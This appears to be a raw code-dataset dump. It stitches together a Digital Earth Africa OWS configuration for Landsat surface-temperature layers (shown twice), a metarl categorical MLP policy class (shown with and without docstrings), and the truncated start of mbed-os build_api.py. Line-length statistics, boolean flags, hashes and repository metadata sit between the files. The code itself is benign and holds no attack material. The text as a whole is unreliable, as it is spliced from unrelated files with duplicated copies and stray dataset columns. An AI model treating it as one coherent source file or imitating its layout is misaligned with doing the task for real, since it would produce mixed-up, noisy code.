bands_ls8_st = {
"ST_B10": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
style_lsc2_st = {
"name": "surface_temperature",
"title": "Surface temperature - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
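# Worked example for the expression above (assuming the standard Collection 2 ST
# scaling of 0.00341802 * DN + 149.0 Kelvin): a raw band value of 44000 maps to
# 0.00341802 * 44000 - 124.15, i.e. roughly 26.2 degrees Celsius.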
style_lsc2_st_masked = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked_ls8 = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True,
"cirrus": "not_high_confidence"
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_qa = {
"name": "surface_temperature_uncertainty",
"title": "Surface temperature uncertainty - Celsius",
"abstract": "Surface temperature uncertainty in degrees Celsius",
"index_expression": "(0.01*st_qa)",
"mpl_ramp": "viridis",
"range": [0.0, 6.0],
"legend": {
"begin": "0.0",
"end": "6.0",
"decimal_places": 1,
"ticks": ["0.0", "1.0", "2.0", "3.0", "4.0", "5.0", "6.0"],
"tick_labels": {
"0.0": {"label": "0.0"},
"1.0": {"label": "1.0"},
"2.0": {"label": "2.0"},
"3.0": {"label": "3.0"},
"4.0": {"label": "4.0"},
"5.0": {"label": "5.0"},
"6.0": {"prefix": ">"},
},
},
}
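# The 0.01 factor above assumes ST_QA stores the uncertainty scaled by 100, so a
# raw value of 250 corresponds to roughly 2.5 degrees of uncertainty.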
layer_ls8 = {
"title": "Surface temperature (Landsat 8)",
"name": "ls8_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 8 product has a spatial resolution of 30 m and a temporal coverage of 2013 to present.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls8_st",
"bands": bands_ls8_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls8_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked_ls8,
],
},
}
layer_ls7 = {
"title": "Surface temperature (Landsat 7)",
"name": "ls7_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 7 product has a spatial resolution of 30 m and a temporal coverage of 1999 to present.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls7_st",
"bands": bands_ls7_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls7_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
layer_ls5 = {
"title": "Surface temperature (Landsat 5)",
"name": "ls5_st",
"abstract": """
The surface temperature product measures the temperature of the Earth’s surface and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, extreme heat events, natural disasters such as volcanic eruptions and wildfires, and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 5 product has a spatial resolution of 30 m and a temporal coverage of 1984 to 2012.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls5_st",
"bands": bands_ls5_st,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls5_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
| 40.075188
| 390
| 0.621764
|
from ows_refactored.common.ows_reslim_cfg import reslim_landsat
bands_ls5_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls7_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls8_st = {
"ST_B10": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
style_lsc2_st = {
"name": "surface_temperature",
"title": "Surface temperature - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
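# Editor's note: the index_expression above folds together the USGS Collection 2
# Level-2 scaling (Kelvin = 0.00341802 * DN + 149.0) and the Kelvin-to-Celsius
# offset (149.0 - 273.15 = -124.15). The helper below is a minimal illustrative
# sketch of the same conversion outside OWS; it assumes numpy is installed and is
# not referenced anywhere in this configuration.
import numpy as np


def st_dn_to_celsius(dn):
    """Convert Landsat C2 L2 surface temperature DNs to degrees Celsius."""
    kelvin = 0.00341802 * np.asarray(dn, dtype="float64") + 149.0
    return kelvin - 273.15  # equivalent to 0.00341802 * dn - 124.15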
style_lsc2_st_masked = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked_ls8 = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True,
"cirrus": "not_high_confidence"
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
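# Editor's note: the pq_masks entries above are evaluated against the QA_PIXEL
# bit flags, so pixels are rendered only where the "clear" flag is set and, in
# the Landsat 8 variant, where cirrus confidence is not high.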
style_lsc2_st_qa = {
"name": "surface_temperature_uncertainty",
"title": "Surface temperature uncertainty - Celsius",
"abstract": "Surface temperature uncertainty in degrees Celsius",
"index_expression": "(0.01*st_qa)",
"mpl_ramp": "viridis",
"range": [0.0, 6.0],
"legend": {
"begin": "0.0",
"end": "6.0",
"decimal_places": 1,
"ticks": ["0.0", "1.0", "2.0", "3.0", "4.0", "5.0", "6.0"],
"tick_labels": {
"0.0": {"label": "0.0"},
"1.0": {"label": "1.0"},
"2.0": {"label": "2.0"},
"3.0": {"label": "3.0"},
"4.0": {"label": "4.0"},
"5.0": {"label": "5.0"},
"6.0": {"prefix": ">"},
},
},
}
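# Editor's note: the 0.01 factor above is, to the best of our reading, the
# Collection 2 scale factor for the ST_QA band (DN * 0.01 gives the surface
# temperature uncertainty in Kelvin); because this is an uncertainty, no
# Kelvin-to-Celsius offset is applied.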
layer_ls8 = {
"title": "Surface temperature (Landsat 8)",
"name": "ls8_st",
"abstract": """
The surface temperature product measures the temperature of the Earth’s surface and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, extreme heat events, natural disasters such as volcanic eruptions and wildfires, and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 8 product has a spatial resolution of 30 m and a temporal coverage of 2013 to present.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls8_st",
"bands": bands_ls8_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls8_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked_ls8,
],
},
}
layer_ls7 = {
"title": "Surface temperature (Landsat 7)",
"name": "ls7_st",
"abstract": """
The surface temperature product measures the temperature of the Earth’s surface and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, extreme heat events, natural disasters such as volcanic eruptions and wildfires, and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 7 product has a spatial resolution of 30 m and a temporal coverage of 1999 to present.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls7_st",
"bands": bands_ls7_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls7_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
layer_ls5 = {
"title": "Surface temperature (Landsat 5)",
"name": "ls5_st",
"abstract": """
The surface temperature product measures the temperature of the Earth’s surface and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, extreme heat events, natural disasters such as volcanic eruptions and wildfires, and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More technical information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
The Landsat 5 product has a spatial resolution of 30 m and a temporal coverage of 1984 to 2012.
Landsat Level-2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls5_st",
"bands": bands_ls5_st,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls5_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
| true
| true
|
790b1a9e45cc381969fa85f3a9d96924b9186a1b
| 5,640
|
py
|
Python
|
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | 2
|
2020-03-15T14:35:15.000Z
|
2021-02-15T16:38:00.000Z
|
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | null | null | null |
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | 1
|
2020-02-24T03:04:23.000Z
|
2020-02-24T03:04:23.000Z
|
"""CategoricalMLPPolicy."""
import akro
import tensorflow as tf
from metarl.tf.distributions import Categorical
from metarl.tf.models import MLPModel
from metarl.tf.policies import StochasticPolicy
class CategoricalMLPPolicy(StochasticPolicy):
"""CategoricalMLPPolicy
    A policy that contains an MLP to make predictions based on
    a categorical distribution.
It only works with akro.Discrete action space.
Args:
env_spec (metarl.envs.env_spec.EnvSpec): Environment specification.
name (str): Policy name, also the variable scope.
hidden_sizes (list[int]): Output dimension of dense layer(s).
For example, (32, 32) means the MLP of this policy consists of two
hidden layers, each with 32 hidden units.
hidden_nonlinearity (callable): Activation function for intermediate
dense layer(s). It should return a tf.Tensor. Set it to
None to maintain a linear activation.
hidden_w_init (callable): Initializer function for the weight
of intermediate dense layer(s). The function should return a
tf.Tensor.
hidden_b_init (callable): Initializer function for the bias
of intermediate dense layer(s). The function should return a
tf.Tensor.
output_nonlinearity (callable): Activation function for output dense
layer. It should return a tf.Tensor. Set it to None to
maintain a linear activation.
output_w_init (callable): Initializer function for the weight
of output dense layer(s). The function should return a
tf.Tensor.
output_b_init (callable): Initializer function for the bias
of output dense layer(s). The function should return a
tf.Tensor.
layer_normalization (bool): Bool for using layer normalization or not.
"""
def __init__(self,
env_spec,
name='CategoricalMLPPolicy',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.tanh,
hidden_w_init=tf.glorot_uniform_initializer(),
hidden_b_init=tf.zeros_initializer(),
output_nonlinearity=tf.nn.softmax,
output_w_init=tf.glorot_uniform_initializer(),
output_b_init=tf.zeros_initializer(),
layer_normalization=False):
assert isinstance(env_spec.action_space, akro.Discrete), (
'CategoricalMLPPolicy only works with akro.Discrete action '
'space.')
super().__init__(name, env_spec)
self.obs_dim = env_spec.observation_space.flat_dim
self.action_dim = env_spec.action_space.n
self.model = MLPModel(output_dim=self.action_dim,
hidden_sizes=hidden_sizes,
hidden_nonlinearity=hidden_nonlinearity,
hidden_w_init=hidden_w_init,
hidden_b_init=hidden_b_init,
output_nonlinearity=output_nonlinearity,
output_w_init=output_w_init,
output_b_init=output_b_init,
layer_normalization=layer_normalization,
name='MLPModel')
self._initialize()
def _initialize(self):
state_input = tf.compat.v1.placeholder(tf.float32,
shape=(None, self.obs_dim))
with tf.compat.v1.variable_scope(self.name) as vs:
self._variable_scope = vs
self.model.build(state_input)
self._f_prob = tf.compat.v1.get_default_session().make_callable(
self.model.networks['default'].outputs,
feed_list=[self.model.networks['default'].input])
@property
def vectorized(self):
"""Vectorized or not."""
return True
def dist_info_sym(self, obs_var, state_info_vars=None, name=None):
"""Symbolic graph of the distribution."""
with tf.compat.v1.variable_scope(self._variable_scope):
prob = self.model.build(obs_var, name=name)
return dict(prob=prob)
def dist_info(self, obs, state_infos=None):
"""Distribution info."""
prob = self._f_prob(obs)
return dict(prob=prob)
def get_action(self, observation):
"""Return a single action."""
flat_obs = self.observation_space.flatten(observation)
prob = self._f_prob([flat_obs])[0]
action = self.action_space.weighted_sample(prob)
return action, dict(prob=prob)
def get_actions(self, observations):
"""Return multiple actions."""
flat_obs = self.observation_space.flatten_n(observations)
probs = self._f_prob(flat_obs)
actions = list(map(self.action_space.weighted_sample, probs))
return actions, dict(prob=probs)
def get_regularizable_vars(self):
"""Get regularizable weight variables under the Policy scope."""
trainable = self.get_trainable_vars()
return [
var for var in trainable
if 'hidden' in var.name and 'kernel' in var.name
]
@property
def distribution(self):
"""Policy distribution."""
return Categorical(self.action_dim)
def __getstate__(self):
"""Object.__getstate__."""
new_dict = super().__getstate__()
del new_dict['_f_prob']
return new_dict
def __setstate__(self, state):
"""Object.__setstate__."""
super().__setstate__(state)
self._initialize()
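# A minimal usage sketch (hedged): the policy must be constructed while a default
# TensorFlow session exists, because _initialize() calls
# tf.compat.v1.get_default_session().make_callable(...). The environment wrapper
# and gym import below are assumptions for illustration and are not part of this
# module:
#
#   import gym
#   from metarl.tf.envs import TfEnv
#
#   with tf.compat.v1.Session():
#       env = TfEnv(gym.make('CartPole-v0'))
#       policy = CategoricalMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32))
#       tf.compat.v1.get_default_session().run(
#           tf.compat.v1.global_variables_initializer())
#       action, _ = policy.get_action(env.reset())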
| 39.71831
| 78
| 0.623227
|
import akro
import tensorflow as tf
from metarl.tf.distributions import Categorical
from metarl.tf.models import MLPModel
from metarl.tf.policies import StochasticPolicy
class CategoricalMLPPolicy(StochasticPolicy):
def __init__(self,
env_spec,
name='CategoricalMLPPolicy',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.tanh,
hidden_w_init=tf.glorot_uniform_initializer(),
hidden_b_init=tf.zeros_initializer(),
output_nonlinearity=tf.nn.softmax,
output_w_init=tf.glorot_uniform_initializer(),
output_b_init=tf.zeros_initializer(),
layer_normalization=False):
assert isinstance(env_spec.action_space, akro.Discrete), (
'CategoricalMLPPolicy only works with akro.Discrete action '
'space.')
super().__init__(name, env_spec)
self.obs_dim = env_spec.observation_space.flat_dim
self.action_dim = env_spec.action_space.n
self.model = MLPModel(output_dim=self.action_dim,
hidden_sizes=hidden_sizes,
hidden_nonlinearity=hidden_nonlinearity,
hidden_w_init=hidden_w_init,
hidden_b_init=hidden_b_init,
output_nonlinearity=output_nonlinearity,
output_w_init=output_w_init,
output_b_init=output_b_init,
layer_normalization=layer_normalization,
name='MLPModel')
self._initialize()
def _initialize(self):
state_input = tf.compat.v1.placeholder(tf.float32,
shape=(None, self.obs_dim))
with tf.compat.v1.variable_scope(self.name) as vs:
self._variable_scope = vs
self.model.build(state_input)
self._f_prob = tf.compat.v1.get_default_session().make_callable(
self.model.networks['default'].outputs,
feed_list=[self.model.networks['default'].input])
@property
def vectorized(self):
return True
def dist_info_sym(self, obs_var, state_info_vars=None, name=None):
with tf.compat.v1.variable_scope(self._variable_scope):
prob = self.model.build(obs_var, name=name)
return dict(prob=prob)
def dist_info(self, obs, state_infos=None):
prob = self._f_prob(obs)
return dict(prob=prob)
def get_action(self, observation):
flat_obs = self.observation_space.flatten(observation)
prob = self._f_prob([flat_obs])[0]
action = self.action_space.weighted_sample(prob)
return action, dict(prob=prob)
def get_actions(self, observations):
flat_obs = self.observation_space.flatten_n(observations)
probs = self._f_prob(flat_obs)
actions = list(map(self.action_space.weighted_sample, probs))
return actions, dict(prob=probs)
def get_regularizable_vars(self):
trainable = self.get_trainable_vars()
return [
var for var in trainable
if 'hidden' in var.name and 'kernel' in var.name
]
@property
def distribution(self):
return Categorical(self.action_dim)
def __getstate__(self):
new_dict = super().__getstate__()
del new_dict['_f_prob']
return new_dict
def __setstate__(self, state):
super().__setstate__(state)
self._initialize()
| true
| true
|
790b1bcb65b0002b2304c49056b552d8e13c6713
| 54,457
|
py
|
Python
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 22
|
2019-05-03T03:39:09.000Z
|
2022-02-26T17:14:15.000Z
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 3
|
2019-07-29T19:48:49.000Z
|
2022-01-10T07:24:43.000Z
|
os-lib/mbed-os/tools/build_api.py
|
ghsecuritylab/BenchIoT
|
4919427d35e578a7ff07ef5e0b4710b6455dd0b9
|
[
"Apache-2.0"
] | 8
|
2019-05-16T08:02:33.000Z
|
2021-08-03T03:41:37.000Z
|
"""
mbed SDK
Copyright (c) 2011-2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import datetime
import uuid
from types import ListType
from shutil import rmtree
from os.path import join, exists, dirname, basename, abspath, normpath, splitext
from os.path import relpath
from os import linesep, remove, makedirs
from time import time
from intelhex import IntelHex
from json import load, dump
from tools.utils import mkdir, run_cmd, run_cmd_ext, NotSupportedException,\
ToolException, InvalidReleaseTargetException, intelhex_offset
from tools.paths import MBED_CMSIS_PATH, MBED_TARGETS_PATH, MBED_LIBRARIES,\
MBED_HEADER, MBED_DRIVERS, MBED_PLATFORM, MBED_HAL, MBED_CONFIG_FILE,\
MBED_LIBRARIES_DRIVERS, MBED_LIBRARIES_PLATFORM, MBED_LIBRARIES_HAL,\
BUILD_DIR
from tools.targets import TARGET_NAMES, TARGET_MAP
from tools.libraries import Library
from tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
from tools.config import Config
RELEASE_VERSIONS = ['2', '5']
def prep_report(report, target_name, toolchain_name, id_name):
"""Setup report keys
Positional arguments:
report - the report to fill
target_name - the target being used
toolchain_name - the toolchain being used
id_name - the name of the executable or library being built
"""
if not target_name in report:
report[target_name] = {}
if not toolchain_name in report[target_name]:
report[target_name][toolchain_name] = {}
if not id_name in report[target_name][toolchain_name]:
report[target_name][toolchain_name][id_name] = []
def prep_properties(properties, target_name, toolchain_name, vendor_label):
"""Setup test properties
Positional arguments:
properties - the dict to fill
target_name - the target the test is targeting
toolchain_name - the toolchain that will compile the test
vendor_label - the vendor
"""
if not target_name in properties:
properties[target_name] = {}
if not toolchain_name in properties[target_name]:
properties[target_name][toolchain_name] = {}
properties[target_name][toolchain_name]["target"] = target_name
properties[target_name][toolchain_name]["vendor"] = vendor_label
properties[target_name][toolchain_name]["toolchain"] = toolchain_name
def create_result(target_name, toolchain_name, id_name, description):
"""Create a result dictionary
Positional arguments:
target_name - the target being built for
toolchain_name - the toolchain doing the building
id_name - the name of the executable or library being built
description - a human readable description of what's going on
"""
cur_result = {}
cur_result["target_name"] = target_name
cur_result["toolchain_name"] = toolchain_name
cur_result["id"] = id_name
cur_result["description"] = description
cur_result["elapsed_time"] = 0
cur_result["output"] = ""
return cur_result
def add_result_to_report(report, result):
"""Add a single result to a report dictionary
Positional arguments:
report - the report to append to
result - the result to append
"""
result["date"] = datetime.datetime.utcnow().isoformat()
result["uuid"] = str(uuid.uuid1())
target = result["target_name"]
toolchain = result["toolchain_name"]
id_name = result['id']
result_wrap = {0: result}
report[target][toolchain][id_name].append(result_wrap)
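# Illustrative flow for the reporting helpers above (the target, toolchain and
# vendor values are example placeholders only):
#
#   report, properties = {}, {}
#   prep_report(report, "K64F", "GCC_ARM", "MY_APP")
#   prep_properties(properties, "K64F", "GCC_ARM", "Freescale")
#   result = create_result("K64F", "GCC_ARM", "MY_APP", "example build")
#   add_result_to_report(report, result)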
def get_config(src_paths, target, toolchain_name):
"""Get the configuration object for a target-toolchain combination
Positional arguments:
src_paths - paths to scan for the configuration files
target - the device we are building for
toolchain_name - the string that identifies the build tools
"""
# Convert src_paths to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
